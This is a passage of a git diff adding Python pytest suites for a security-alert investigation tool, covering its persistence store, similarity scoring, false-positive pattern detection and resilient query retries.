+                    started_at=reference_time - timedelta(minutes=index),
+                    completed_at=reference_time,
+                    duration_seconds=60.0,
+                    status="completed",
+                    evidence_count=0,
+                    highest_pyramid_level=0,
+                    techniques_identified=[],
+                    queries_executed=[],
+                    query_success_rate=0.0,
+                    effective_queries=[],
+                    is_true_positive=index < 2,
+                )
+            )
+
+        tools = LearningTools(store=store)
+        verdict = await tools.check_false_positive_pattern(alert_name="NoisyAlert")
+
+        assert "false_positive_rate" in verdict
+        # Accept either an explicit known-pattern flag or the 80% rate in the text.
+        assert verdict.get("is_known_pattern") or "80%" in verdict.get("false_positive_rate", "")
+
+    @pytest.mark.asyncio
+    async def test_check_fp_with_fingerprint(self, populated_learning_tools: LearningTools) -> None:
+        """Supplying the alert fingerprint as well still yields a confidence value."""
+        verdict = await populated_learning_tools.check_false_positive_pattern(
+            alert_fingerprint="rule-cpu-001",
+            alert_name="HighCPUUsage",
+        )
+
+        # Only the presence of a confidence rating is verified here.
+        assert "confidence" in verdict
+
+
+class TestGetInvestigationStatistics:
+    """Exercises the ``get_investigation_statistics`` learning tool."""
+
+    @pytest.mark.asyncio
+    async def test_get_statistics_empty_store(self, learning_tools: LearningTools) -> None:
+        """A store with no records reports zero investigations."""
+        stats = await learning_tools.get_investigation_statistics()
+
+        assert stats["total_investigations"] == 0
+
+    @pytest.mark.asyncio
+    async def test_get_statistics_with_data(self, populated_learning_tools: LearningTools) -> None:
+        """A populated store reports a count plus every top-level section."""
+        stats = await populated_learning_tools.get_investigation_statistics()
+
+        assert stats["total_investigations"] >= 1
+        # Each section must be present; its contents are covered by other tests.
+        expected_sections = ("status_distribution", "performance", "query_insights", "labeling")
+        for section in expected_sections:
+            assert section in stats
+
+    @pytest.mark.asyncio
+    async def test_get_statistics_performance_metrics(
+        self, populated_learning_tools: LearningTools
+    ) -> None:
+        """The ``performance`` section exposes the three averaged metrics."""
+        stats = await populated_learning_tools.get_investigation_statistics()
+        performance = stats["performance"]
+
+        metric_names = ("avg_evidence_count", "avg_pyramid_level", "avg_duration_seconds")
+        for metric in metric_names:
+            assert metric in performance
+
+    @pytest.mark.asyncio
+    async def test_get_statistics_labeling_info(
+        self, populated_learning_tools: LearningTools
+    ) -> None:
+        """The ``labeling`` section exposes label counts and the true-positive rate."""
+        stats = await populated_learning_tools.get_investigation_statistics()
+        labeling = stats["labeling"]
+
+        # Only key presence is checked: the rate itself may be None or a value.
+        label_keys = ("true_positives", "false_positives", "true_positive_rate")
+        for key in label_keys:
+            assert key in labeling
+
+
+class TestGuidanceGeneration:
+    """Checks the guidance text returned by ``find_similar_investigations``."""
+
+    @pytest.mark.asyncio
+    async def test_guidance_with_effective_queries(
+        self, populated_learning_tools: LearningTools
+    ) -> None:
+        """When similar investigations are found, the guidance text is non-empty."""
+        response = await populated_learning_tools.find_similar_investigations(
+            alert_name="HighCPUUsage"
+        )
+
+        # Without a match there is no guidance to inspect, so the test ends here.
+        if not response["found"]:
+            return
+
+        assert len(response["guidance"]) > 0
+
+    @pytest.mark.asyncio
+    async def test_guidance_with_high_tp_rate(self, store: InvestigationStore) -> None:
+        """Guidance for an alert that was always a true positive reflects that history."""
+        reference_time = datetime.now(timezone.utc)
+
+        # Five completed investigations, every one labelled as a true positive.
+        for index in range(5):
+            store.store_investigation(
+                StoredInvestigation(
+                    investigation_id=f"tp-inv-{index}",
+                    alert_name="CriticalAlert",
+                    alert_fingerprint="critical-rule",
+                    severity="critical",
+                    technique_id="T1000",
+                    technique_name="Test",
+                    started_at=reference_time - timedelta(minutes=index),
+                    completed_at=reference_time,
+                    duration_seconds=600.0,
+                    status="completed",
+                    evidence_count=5,
+                    highest_pyramid_level=3,
+                    techniques_identified=["T1000"],
+                    queries_executed=[],
+                    query_success_rate=0.8,
+                    effective_queries=["{job='test'}"],
+                    is_true_positive=True,
+                )
+            )
+
+        tools = LearningTools(store=store)
+        response = await tools.find_similar_investigations(alert_name="CriticalAlert")
+
+        assert response["found"] is True
+        guidance_text = response["guidance"].lower()
+        assert "true positive" in guidance_text or "thorough" in guidance_text
+
+
+class TestEdgeCases:
+    """Covers unusual inputs to the learning tools."""
+
+    @pytest.mark.asyncio
+    async def test_find_similar_with_all_none_params(
+        self, populated_learning_tools: LearningTools
+    ) -> None:
+        """Calling ``find_similar_investigations`` without arguments still answers."""
+        response = await populated_learning_tools.find_similar_investigations()
+
+        # Either outcome is acceptable (recent investigations or nothing similar);
+        # the response only has to state which one it is.
+        assert "found" in response
+
+    @pytest.mark.asyncio
+    async def test_unicode_in_alert_name(self, store: InvestigationStore) -> None:
+        """An alert name containing a non-ASCII character can be stored and matched."""
+        snowman_alert = "Alert \u2603 Snowman"  # U+2603 is the snowman character
+        timestamp = datetime.now(timezone.utc)
+        record = StoredInvestigation(
+            investigation_id="unicode-inv",
+            alert_name=snowman_alert,
+            alert_fingerprint="unicode-rule",
+            severity="low",
+            technique_id=None,
+            technique_name=None,
+            started_at=timestamp,
+            completed_at=timestamp,
+            duration_seconds=60.0,
+            status="completed",
+            evidence_count=0,
+            highest_pyramid_level=0,
+            techniques_identified=[],
+            queries_executed=[],
+            query_success_rate=0.0,
+            effective_queries=[],
+        )
+        store.store_investigation(record)
+
+        tools = LearningTools(store=store)
+        response = await tools.find_similar_investigations(alert_name=snowman_alert)
+
+        assert response["found"] is True
+
+    @pytest.mark.asyncio
+    async def test_very_long_query_pattern(self, store: InvestigationStore) -> None:
+        """A query pattern with 100 chained line filters is handled without error."""
+        oversized_pattern = "{job='test'}" + " |= 'x'" * 100
+        execution = {
+            "query_pattern": oversized_pattern,
+            "successful": True,
+            "produced_evidence": True,
+            "alert_type": "TestAlert",
+        }
+        # Three identical executions are recorded for the same pattern.
+        for _ in range(3):
+            store.update_query_effectiveness(**execution)
+
+        tools = LearningTools(store=store)
+        response = await tools.get_effective_queries()
+
+        assert response["found"] is True
diff --git a/tests/test_persistence.py b/tests/test_persistence.py
new file mode 100644
index 00000000..996240fc
--- /dev/null
+++ b/tests/test_persistence.py
@@ -0,0 +1,537 @@
+"""Tests for the Investigation Persistence and Learning System."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.persistence import (
+ InvestigationStore,
+ QueryEffectiveness,
+ StoredInvestigation,
+ get_investigation_store,
+ reset_investigation_store,
+)
+
+
+@pytest.fixture
+def temp_db(tmp_path: Path) -> Path:
+    """Return a database path inside pytest's per-test ``tmp_path`` directory."""
+    # tmp_path is unique per test and managed by pytest, so no generator is needed.
+    return tmp_path / "test_investigations.db"
+
+
+@pytest.fixture
+def store(temp_db: Path) -> InvestigationStore:
+    """Provide an ``InvestigationStore`` constructed on the ``temp_db`` path."""
+    return InvestigationStore(temp_db)
+
+
+@pytest.fixture
+def sample_investigation() -> StoredInvestigation:
+    """Build a fully populated ``HighCPUUsage`` investigation labelled true positive."""
+    finished = datetime.now(timezone.utc)
+    return StoredInvestigation(
+        investigation_id="inv-001",
+        status="completed",
+        severity="warning",
+        alert_name="HighCPUUsage",
+        alert_fingerprint="rule-123",
+        technique_id="T1059.001",
+        technique_name="PowerShell",
+        techniques_identified=["T1059.001", "T1086"],
+        started_at=finished - timedelta(minutes=10),
+        completed_at=finished,
+        duration_seconds=600.0,
+        evidence_count=5,
+        highest_pyramid_level=3,
+        queries_executed=[
+            {"query": "{job='windows'}", "result_count": 10},
+            {"query": "{job='linux'}", "result_count": 0},
+        ],
+        effective_queries=["{job='windows'}"],
+        query_success_rate=0.5,
+        is_true_positive=True,
+        analyst_notes="Confirmed malicious activity",
+        metadata={"host": "server01", "user": "admin"},
+    )
+
+
+class TestStoredInvestigation:
+    """Checks dictionary conversion of the ``StoredInvestigation`` dataclass."""
+
+    def test_to_dict(self, sample_investigation: StoredInvestigation) -> None:
+        """``to_dict`` keeps the checked scalar fields and emits both timestamps."""
+        serialized = sample_investigation.to_dict()
+
+        for timestamp_key in ("started_at", "completed_at"):
+            assert timestamp_key in serialized
+        assert serialized["is_true_positive"] is True
+        assert serialized["evidence_count"] == 5
+        assert serialized["status"] == "completed"
+        assert serialized["technique_id"] == "T1059.001"
+        assert serialized["severity"] == "warning"
+        assert serialized["alert_name"] == "HighCPUUsage"
+        assert serialized["investigation_id"] == "inv-001"
+
+    def test_from_dict(self, sample_investigation: StoredInvestigation) -> None:
+        """A ``to_dict``/``from_dict`` round trip preserves the compared fields."""
+        serialized = sample_investigation.to_dict()
+        rebuilt = StoredInvestigation.from_dict(serialized)
+
+        assert rebuilt.is_true_positive == sample_investigation.is_true_positive
+        assert rebuilt.evidence_count == sample_investigation.evidence_count
+        assert rebuilt.status == sample_investigation.status
+        assert rebuilt.technique_id == sample_investigation.technique_id
+        assert rebuilt.severity == sample_investigation.severity
+        assert rebuilt.alert_name == sample_investigation.alert_name
+        assert rebuilt.investigation_id == sample_investigation.investigation_id
+
+    def test_from_dict_with_missing_optional_fields(self) -> None:
+        """Optional fields absent from the input dict fall back to empty defaults."""
+        required_only = {
+            "investigation_id": "inv-min",
+            "alert_name": "TestAlert",
+            "alert_fingerprint": "fp-001",
+            "severity": "low",
+            "started_at": datetime.now(timezone.utc).isoformat(),
+            "completed_at": datetime.now(timezone.utc).isoformat(),
+            "duration_seconds": 100.0,
+            "status": "completed",
+            "evidence_count": 0,
+            "highest_pyramid_level": 0,
+        }
+
+        parsed = StoredInvestigation.from_dict(required_only)
+
+        assert parsed.investigation_id == "inv-min"
+        assert parsed.technique_id is None
+        assert parsed.is_true_positive is None
+        assert parsed.techniques_identified == []
+        assert parsed.queries_executed == []
+
+
+class TestQueryEffectiveness:
+    """Checks the derived rate properties of ``QueryEffectiveness``."""
+
+    def test_success_rate_calculation(self) -> None:
+        """Seven successes out of ten executions give a success rate of 0.7."""
+        effectiveness = QueryEffectiveness(
+            alert_types=["AlertA"],
+            evidence_producing=3,
+            successful_executions=7,
+            total_executions=10,
+            query_pattern="{job='test'}",
+        )
+
+        assert effectiveness.success_rate == 0.7
+
+    def test_evidence_rate_calculation(self) -> None:
+        """Three evidence-producing runs out of ten give an evidence rate of 0.3."""
+        effectiveness = QueryEffectiveness(
+            alert_types=["AlertA"],
+            evidence_producing=3,
+            successful_executions=7,
+            total_executions=10,
+            query_pattern="{job='test'}",
+        )
+
+        assert effectiveness.evidence_rate == 0.3
+
+    def test_zero_executions(self) -> None:
+        """With no executions recorded, both rates are 0.0."""
+        never_run = QueryEffectiveness(
+            alert_types=[],
+            evidence_producing=0,
+            successful_executions=0,
+            total_executions=0,
+            query_pattern="{job='test'}",
+        )
+
+        assert never_run.evidence_rate == 0.0
+        assert never_run.success_rate == 0.0
+
+
+class TestInvestigationStore:
+    """Tests for InvestigationStore: schema, storage, similarity, query stats, labels."""
+
+    def test_init_creates_schema(self, store: InvestigationStore) -> None:
+        """Test that schema is created on init."""
+        with store._get_connection() as conn:
+            cursor = conn.cursor()
+
+            # Check investigations table exists
+            cursor.execute(
+                "SELECT name FROM sqlite_master WHERE type='table' AND name='investigations'"
+            )
+            assert cursor.fetchone() is not None
+
+            # Check query_effectiveness table exists
+            cursor.execute(
+                "SELECT name FROM sqlite_master WHERE type='table' AND name='query_effectiveness'"
+            )
+            assert cursor.fetchone() is not None
+
+            # Check schema_info table exists
+            cursor.execute(
+                "SELECT name FROM sqlite_master WHERE type='table' AND name='schema_info'"
+            )
+            assert cursor.fetchone() is not None
+
+    def test_store_and_retrieve_investigation(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test storing and retrieving an investigation."""
+        store.store_investigation(sample_investigation)
+
+        retrieved = store.get_investigation(sample_investigation.investigation_id)
+
+        assert retrieved is not None
+        assert retrieved.investigation_id == sample_investigation.investigation_id
+        assert retrieved.alert_name == sample_investigation.alert_name
+        assert retrieved.evidence_count == sample_investigation.evidence_count
+        assert retrieved.is_true_positive == sample_investigation.is_true_positive
+
+    def test_get_nonexistent_investigation(self, store: InvestigationStore) -> None:
+        """Test retrieving a non-existent investigation."""
+        result = store.get_investigation("nonexistent-id")
+        assert result is None
+
+    def test_store_investigation_upsert(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test that storing an investigation twice updates it."""
+        store.store_investigation(sample_investigation)
+
+        # Modify and store again
+        sample_investigation.evidence_count = 10
+        sample_investigation.status = "escalated"
+        store.store_investigation(sample_investigation)
+
+        retrieved = store.get_investigation(sample_investigation.investigation_id)
+
+        assert retrieved is not None
+        assert retrieved.evidence_count == 10
+        assert retrieved.status == "escalated"
+
+    def test_find_similar_investigations_by_fingerprint(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test finding similar investigations by fingerprint."""
+        store.store_investigation(sample_investigation)
+
+        similar = store.find_similar_investigations(
+            alert_fingerprint=sample_investigation.alert_fingerprint
+        )
+
+        assert len(similar) == 1
+        assert similar[0].investigation.investigation_id == sample_investigation.investigation_id
+        assert "same_alert_fingerprint" in similar[0].matching_factors
+
+    def test_find_similar_investigations_by_technique(self, store: InvestigationStore) -> None:
+        """Test finding similar investigations by technique."""
+        now = datetime.now(timezone.utc)
+
+        # Create multiple investigations with same technique
+        for i in range(3):
+            inv = StoredInvestigation(
+                investigation_id=f"inv-{i}",
+                alert_name=f"Alert{i}",
+                alert_fingerprint=f"fp-{i}",
+                severity="warning",
+                technique_id="T1059.001",
+                technique_name="PowerShell",
+                started_at=now - timedelta(minutes=10),
+                completed_at=now,
+                duration_seconds=600.0,
+                status="completed",
+                evidence_count=i,
+                highest_pyramid_level=i,
+                techniques_identified=["T1059.001"],
+                queries_executed=[],
+                query_success_rate=0.5,
+                effective_queries=[],
+            )
+            store.store_investigation(inv)
+
+        similar = store.find_similar_investigations(technique_id="T1059.001")
+
+        assert len(similar) == 3
+        for sim in similar:
+            assert "same_technique" in sim.matching_factors
+
+    def test_find_similar_investigations_no_criteria(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test that a criteria-free search never reports unknown investigations."""
+        store.store_investigation(sample_investigation)
+        expected_id = sample_investigation.investigation_id
+        similar = store.find_similar_investigations()
+        # The result may be empty or hold the one stored record, but nothing else.
+        assert len(similar) <= 1
+        assert all(s.investigation.investigation_id == expected_id for s in similar)
+
+    def test_find_similar_investigations_multiple_criteria(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test finding similar investigations with multiple criteria."""
+        store.store_investigation(sample_investigation)
+
+        similar = store.find_similar_investigations(
+            alert_name=sample_investigation.alert_name,
+            technique_id=sample_investigation.technique_id,
+            severity=sample_investigation.severity,
+        )
+
+        assert len(similar) == 1
+        # alert_name (0.3) + technique (0.15) + severity (0.05) = 0.5
+        # approx() absorbs floating-point rounding without accepting larger scores.
+        assert similar[0].similarity_score == pytest.approx(0.5)
+
+    def test_update_query_effectiveness_new_query(self, store: InvestigationStore) -> None:
+        """Test updating effectiveness for a new query."""
+        store.update_query_effectiveness(
+            query_pattern="{job='test'}",
+            successful=True,
+            produced_evidence=True,
+            alert_type="TestAlert",
+        )
+        # After a single execution the query may still be below the reporting
+        # threshold, so it may be absent, but no other pattern may be reported.
+        initial = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+        assert all(q.query_pattern == "{job='test'}" for q in initial)
+
+        for _ in range(2):
+            store.update_query_effectiveness(
+                query_pattern="{job='test'}",
+                successful=True,
+                produced_evidence=True,
+                alert_type="TestAlert",
+            )
+
+        effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+        assert len(effective) == 1
+        assert effective[0].query_pattern == "{job='test'}"
+        assert effective[0].total_executions == 3
+
+    def test_update_query_effectiveness_existing_query(self, store: InvestigationStore) -> None:
+        """Test updating effectiveness for an existing query."""
+        # Add initial record
+        for _ in range(3):
+            store.update_query_effectiveness(
+                query_pattern="{job='existing'}",
+                successful=True,
+                produced_evidence=False,
+                alert_type="AlertA",
+            )
+
+        # Update with evidence
+        store.update_query_effectiveness(
+            query_pattern="{job='existing'}",
+            successful=True,
+            produced_evidence=True,
+            alert_type="AlertB",
+        )
+
+        effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+        matching = [q for q in effective if q.query_pattern == "{job='existing'}"]
+
+        assert len(matching) == 1
+        assert matching[0].total_executions == 4
+        assert matching[0].evidence_producing == 1
+        assert "AlertA" in matching[0].alert_types
+        assert "AlertB" in matching[0].alert_types
+
+    def test_get_effective_queries_filtered_by_alert_type(self, store: InvestigationStore) -> None:
+        """Test getting effective queries filtered by alert type."""
+        # Add queries for different alert types
+        for _ in range(3):
+            store.update_query_effectiveness(
+                query_pattern="{job='alert_a'}",
+                successful=True,
+                produced_evidence=True,
+                alert_type="AlertA",
+            )
+            store.update_query_effectiveness(
+                query_pattern="{job='alert_b'}",
+                successful=True,
+                produced_evidence=True,
+                alert_type="AlertB",
+            )
+
+        effective_a = store.get_effective_queries(alert_type="AlertA", min_evidence_rate=0.0)
+        effective_b = store.get_effective_queries(alert_type="AlertB", min_evidence_rate=0.0)
+
+        assert len(effective_a) == 1
+        assert effective_a[0].query_pattern == "{job='alert_a'}"
+        assert len(effective_b) == 1
+        assert effective_b[0].query_pattern == "{job='alert_b'}"
+
+    def test_get_statistics(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test getting overall statistics."""
+        store.store_investigation(sample_investigation)
+
+        stats = store.get_statistics()
+
+        assert stats["total_investigations"] == 1
+        assert "completed" in stats["status_distribution"]
+        assert stats["avg_evidence_count"] == 5.0
+        assert stats["labeling"]["true_positives"] == 1
+        assert stats["labeling"]["false_positives"] == 0
+
+    def test_get_statistics_empty_store(self, store: InvestigationStore) -> None:
+        """Test getting statistics from empty store."""
+        stats = store.get_statistics()
+
+        assert stats["total_investigations"] == 0
+        assert stats["avg_evidence_count"] == 0
+        assert stats["labeling"]["true_positives"] == 0
+
+    def test_label_investigation(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test labeling an investigation."""
+        sample_investigation.is_true_positive = None
+        store.store_investigation(sample_investigation)
+
+        # Label as false positive
+        result = store.label_investigation(
+            investigation_id=sample_investigation.investigation_id,
+            is_true_positive=False,
+            analyst_notes="Benign activity",
+        )
+
+        assert result is True
+
+        retrieved = store.get_investigation(sample_investigation.investigation_id)
+        assert retrieved is not None
+        assert retrieved.is_true_positive is False
+        assert retrieved.analyst_notes == "Benign activity"
+
+    def test_label_nonexistent_investigation(self, store: InvestigationStore) -> None:
+        """Test labeling a non-existent investigation."""
+        result = store.label_investigation(
+            investigation_id="nonexistent",
+            is_true_positive=True,
+        )
+
+        assert result is False
+
+    def test_get_false_positive_patterns(self, store: InvestigationStore) -> None:
+        """Test getting false positive patterns."""
+        now = datetime.now(timezone.utc)
+
+        # Create multiple false positive investigations with same fingerprint
+        for i in range(5):
+            inv = StoredInvestigation(
+                investigation_id=f"fp-inv-{i}",
+                alert_name="NoisyAlert",
+                alert_fingerprint="noisy-rule-001",
+                severity="low",
+                technique_id="T1000",
+                technique_name="Test",
+                started_at=now - timedelta(minutes=10),
+                completed_at=now,
+                duration_seconds=60.0,
+                status="completed",
+                evidence_count=0,
+                highest_pyramid_level=0,
+                techniques_identified=[],
+                queries_executed=[],
+                query_success_rate=0.0,
+                effective_queries=[],
+                is_true_positive=False,
+            )
+            store.store_investigation(inv)
+
+        patterns = store.get_false_positive_patterns(min_occurrences=3)
+
+        assert len(patterns) >= 1
+        noisy_pattern = next((p for p in patterns if p["alert_name"] == "NoisyAlert"), None)
+        assert noisy_pattern is not None
+        assert noisy_pattern["occurrences"] >= 3
+
+
+class TestGlobalStore:
+    """Tests for global store functions; each test always resets the global store."""
+
+    def test_get_investigation_store_creates_default(self) -> None:
+        """Test that get_investigation_store creates a store at the given path."""
+        reset_investigation_store()
+        with tempfile.TemporaryDirectory() as tmpdir:
+            try:
+                db_path = Path(tmpdir) / "test.db"
+                store = get_investigation_store(db_path)
+
+                assert store is not None
+                assert store.db_path == db_path
+            finally:
+                reset_investigation_store()  # runs even if an assertion fails
+
+    def test_get_investigation_store_returns_same_instance(self) -> None:
+        """Test that get_investigation_store returns the same instance."""
+        reset_investigation_store()
+        with tempfile.TemporaryDirectory() as tmpdir:
+            try:
+                db_path = Path(tmpdir) / "test.db"
+                store1 = get_investigation_store(db_path)
+                store2 = get_investigation_store()
+
+                assert store1 is store2
+            finally:
+                reset_investigation_store()  # runs even if an assertion fails
+
+    def test_reset_investigation_store(self) -> None:
+        """Test resetting the global store."""
+        reset_investigation_store()
+        with tempfile.TemporaryDirectory() as tmpdir:
+            try:
+                db_path = Path(tmpdir) / "test.db"
+                store1 = get_investigation_store(db_path)
+                reset_investigation_store()
+
+                # After reset, a new call should create new instance
+                store2 = get_investigation_store(db_path)
+
+                assert store1 is not store2
+            finally:
+                reset_investigation_store()  # runs even if an assertion fails
+
+
+class TestSimilarityScoring:
+    """Tests for similarity calculation; scores are compared with pytest.approx."""
+
+    def test_similarity_score_all_factors(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test similarity score with all matching factors."""
+        store.store_investigation(sample_investigation)
+
+        similar = store.find_similar_investigations(
+            alert_name=sample_investigation.alert_name,
+            alert_fingerprint=sample_investigation.alert_fingerprint,
+            technique_id=sample_investigation.technique_id,
+            severity=sample_investigation.severity,
+        )
+
+        assert len(similar) == 1
+        # 0.5 (fingerprint) + 0.3 (name) + 0.15 (technique) + 0.05 (severity) = 1.0
+        assert similar[0].similarity_score == pytest.approx(1.0)
+        assert len(similar[0].matching_factors) == 4
+
+    def test_similarity_score_partial_match(
+        self, store: InvestigationStore, sample_investigation: StoredInvestigation
+    ) -> None:
+        """Test similarity score with partial match."""
+        store.store_investigation(sample_investigation)
+
+        similar = store.find_similar_investigations(
+            technique_id=sample_investigation.technique_id,
+        )
+
+        assert len(similar) == 1
+        assert similar[0].similarity_score == pytest.approx(0.15)
+        assert similar[0].matching_factors == ["same_technique"]
diff --git a/tests/test_query_resilience.py b/tests/test_query_resilience.py
new file mode 100644
index 00000000..2bd12438
--- /dev/null
+++ b/tests/test_query_resilience.py
@@ -0,0 +1,516 @@
+"""Tests for the Query Resilience module."""
+
+import asyncio
+from typing import Any
+from unittest.mock import AsyncMock
+
+import pytest
+
+from ares.core.query_resilience import (
+ QueryAttempt,
+ QueryResilientExecutor,
+ QueryStats,
+ get_resilient_executor,
+ reset_resilient_executor,
+)
+
+
+class TestQueryAttempt:
+    """Checks construction of the ``QueryAttempt`` dataclass."""
+
+    def test_create_successful_attempt(self) -> None:
+        """A successful attempt keeps its result count and has no error."""
+        succeeded = QueryAttempt(
+            attempt_number=1,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T11:00:00Z",
+            duration_ms=500,
+            result_count=100,
+            success=True,
+        )
+
+        assert succeeded.result_count == 100
+        assert succeeded.error is None
+        assert succeeded.success is True
+
+    def test_create_failed_attempt(self) -> None:
+        """A failed attempt keeps its error text and reports zero results."""
+        failed = QueryAttempt(
+            attempt_number=2,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T11:00:00Z",
+            duration_ms=30000,
+            error="Timeout after 30s",
+            success=False,
+        )
+
+        assert failed.result_count == 0
+        assert failed.error == "Timeout after 30s"
+        assert failed.success is False
+
+
+class TestQueryStats:
+    """Checks defaults and the success-rate property of ``QueryStats``."""
+
+    def test_default_values(self) -> None:
+        """A ``QueryStats`` built without arguments starts with zeroed counters."""
+        fresh_stats = QueryStats()
+
+        assert fresh_stats.attempts == []
+        assert fresh_stats.time_range_reductions == 0
+        assert fresh_stats.retry_count == 0
+        assert fresh_stats.timeout_count == 0
+        assert fresh_stats.successful_attempts == 0
+        assert fresh_stats.total_attempts == 0
+
+    def test_success_rate_calculation(self) -> None:
+        """Seven successes out of ten attempts give a success rate of 0.7."""
+        seven_of_ten = QueryStats(successful_attempts=7, total_attempts=10)
+
+        assert seven_of_ten.success_rate == 0.7
+
+    def test_success_rate_zero_attempts(self) -> None:
+        """With no attempts recorded, the success rate is 0.0."""
+        no_attempts = QueryStats(successful_attempts=0, total_attempts=0)
+
+        assert no_attempts.success_rate == 0.0
+
+
+class TestQueryResilientExecutor:
+ """Tests for QueryResilientExecutor."""
+
+    def test_init_default_values(self) -> None:
+        """An executor built without arguments exposes the expected defaults."""
+        default_executor = QueryResilientExecutor()
+
+        assert default_executor.chunk_size_minutes == 30
+        assert default_executor.enable_chunking is True
+        assert default_executor.initial_timeout == 30.0
+        assert default_executor.max_retries == 3
+
+    def test_init_custom_values(self) -> None:
+        """Constructor arguments are readable back from the matching attributes."""
+        overrides = {
+            "max_retries": 5,
+            "initial_timeout": 60.0,
+            "enable_chunking": False,
+            "chunk_size_minutes": 15,
+        }
+        custom_executor = QueryResilientExecutor(**overrides)
+        assert custom_executor.max_retries == 5
+        assert custom_executor.initial_timeout == 60.0
+        assert custom_executor.enable_chunking is False
+        assert custom_executor.chunk_size_minutes == 15
+
+    @pytest.mark.asyncio
+    async def test_execute_with_resilience_success(self) -> None:
+        """A query that succeeds on the first call is returned with zero retries."""
+        executor = QueryResilientExecutor()
+
+        payload = {
+            "status": "success",
+            "data": {"result": [{"values": [[1, "log1"], [2, "log2"]]}]},
+        }
+        mock_query_fn = AsyncMock(return_value=payload)
+
+        outcome = await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T11:00:00Z",
+        )
+
+        # The executor annotates the response and counts the single success.
+        assert outcome["status"] == "success"
+        assert "_resilience_metadata" in outcome
+        assert outcome["_resilience_metadata"]["retry_count"] == 0
+        assert executor.stats.successful_attempts == 1
+
+    @pytest.mark.asyncio
+    async def test_execute_with_resilience_timeout_retry(self) -> None:
+        """A first call that times out is followed by a successful retry."""
+        executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1)
+
+        calls_seen: list[int] = []
+
+        async def timeout_then_success(**kwargs: Any) -> dict[str, Any]:
+            calls_seen.append(1)
+            # Only the first call sleeps past the 0.1s timeout; later calls return at once.
+            if len(calls_seen) == 1:
+                await asyncio.sleep(1)
+            return {"status": "success", "data": {"result": []}}
+
+        mock_query_fn = AsyncMock(side_effect=timeout_then_success)
+
+        outcome = await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T10:30:00Z",
+        )
+
+        assert executor.stats.timeout_count >= 1
+        assert outcome["status"] == "success"
+
+    @pytest.mark.asyncio
+    async def test_execute_with_resilience_all_retries_fail(self) -> None:
+        """When every call times out, an error result with a suggestion is returned."""
+        executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1)
+
+        async def always_timeout(**kwargs: Any) -> dict[str, Any]:
+            await asyncio.sleep(1)  # longer than the 0.1s timeout on every call
+            return {"status": "success", "data": {"result": []}}
+
+        mock_query_fn = AsyncMock(side_effect=always_timeout)
+
+        outcome = await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T10:30:00Z",
+        )
+
+        assert executor.stats.timeout_count > 0
+        assert outcome["status"] == "error"
+        assert "suggestion" in outcome
+
+    @pytest.mark.asyncio
+    async def test_execute_with_resilience_error_response(self) -> None:
+        """An error payload that mentions a timeout is counted as a timeout."""
+        executor = QueryResilientExecutor(max_retries=2)
+
+        error_payload = {
+            "status": "error",
+            "error": "timeout exceeded while executing query",
+        }
+        mock_query_fn = AsyncMock(return_value=error_payload)
+
+        await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T10:30:00Z",
+        )
+
+        # The query function returns normally here; the timeout is reported only
+        # through the payload text, and it must still show up in the statistics.
+        assert executor.stats.timeout_count > 0
+
+    @pytest.mark.asyncio
+    async def test_execute_with_resilience_time_range_reduction(self) -> None:
+        """Repeated timeouts lead the executor to record a time range reduction."""
+        executor = QueryResilientExecutor(max_retries=1, initial_timeout=0.05)
+
+        # Every (start, end) window the query function is called with, in call order.
+        received_time_ranges: list[tuple[str, str]] = []
+
+        async def track_time_ranges(**kwargs: Any) -> dict[str, Any]:
+            window = (kwargs.get("start_time", ""), kwargs.get("end_time", ""))
+            received_time_ranges.append(window)
+
+            # The first two calls sleep past the 0.05s timeout; later calls succeed.
+            if len(received_time_ranges) < 3:
+                await asyncio.sleep(1)
+            return {"status": "success", "data": {"result": []}}
+
+        mock_query_fn = AsyncMock(side_effect=track_time_ranges)
+
+        await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T11:00:00Z",
+        )
+
+        # Only the statistics counter is checked; the recorded windows are kept
+        # for inspection and are not asserted on.
+        assert executor.stats.time_range_reductions > 0
+
+    @pytest.mark.asyncio
+    async def test_execute_chunked_for_large_range(self) -> None:
+        """A three-hour range is split into several calls and flagged as chunked."""
+        executor = QueryResilientExecutor(chunk_size_minutes=30)
+
+        chunk_starts: list[str] = []
+
+        async def track_chunks(**kwargs: Any) -> dict[str, Any]:
+            chunk_starts.append(kwargs.get("start_time", ""))
+            return {"status": "success", "data": {"result": [{"values": [[1, "log"]]}]}}
+
+        mock_query_fn = AsyncMock(side_effect=track_chunks)
+
+        # 10:00 to 13:00 is three hours, which should trigger chunking.
+        outcome = await executor.execute_with_resilience(
+            query_fn=mock_query_fn,
+            query="{job='test'}",
+            start_time="2024-01-15T10:00:00Z",
+            end_time="2024-01-15T13:00:00Z",
